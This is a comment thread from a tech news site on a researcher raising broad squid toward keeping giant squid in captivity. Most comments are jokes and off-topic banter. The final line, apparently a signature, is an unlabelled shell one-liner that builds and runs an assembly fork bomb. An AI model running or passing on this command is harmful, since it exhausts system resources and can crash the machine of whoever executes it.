Breaking the Squid Barrier
An anonymous reader writes "Dr. Steve O'Shea of Auckland, New Zealand is attempting to break the record for keeping deep sea squid alive in captivity, with the goal of being able to raise a giant squid one day. Right now, he's raising the broad squid, sepioteuthis australis, from egg masses found in seaweed. This is a lot harder than it sounds, because the squid he's studying grow rapidly and eat only live prey, making it hard for them to keep the squid from becoming prey themselves. If his research works out, you might one day be able to visit an aquarium and see giant squid."
1. Raise giant squid
2. ???
3. Profit!
I think #2 could easily be "open chain of squid restaurants" or "conquer the world"
Giant squid are trying to break the human barrier: to tes how long they can keep human beings alive at great depth. Currently the record stands at 120 seconds.
http://michaelsmith.id.au
That isn't singing. Air is escaping from the squid's pores because there isn't enough atmospheric pressure at sea level to properly hold the colloidal structure together which makes it sound like the squid is singing.
Feeding is only one aspect of caring for giant squids.
The first thing that came to my mind was proxying web servers.
The second thing was a row of squid (the living kind) being used as a barricade.
Knowledge is how to play a game, intelligence is how to win, wisdom is knowing what game to play.
nonetheless, trying to raise giant squid may not be a good idea:
http://xkcd.com/520/
NO CARRIER
When I hear "giant squid," I think of a... giant squid. Per Wikipedia: "Giant squid can grow to a tremendous size: recent estimates put the maximum size at 13 metres (43 ft) for females and 10 metres (33 ft) for males from caudal fin to the tip of the two long tentacles (second only to the colossal squid at an estimated 14 metres (46 ft), one of the largest living organisms)."
Ah am not a crook! (\(-__-)/)
Java also gives the web designer a more broader pallette of techniques for crashing the users browsers that work cross platform just as god intended.
Excuse the Unicode crap in my posts. That's an apostrophe, and slashdot is busted.
Saying Java is better because it works on all platforms is like saying anal sex is better because it works on all genders.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;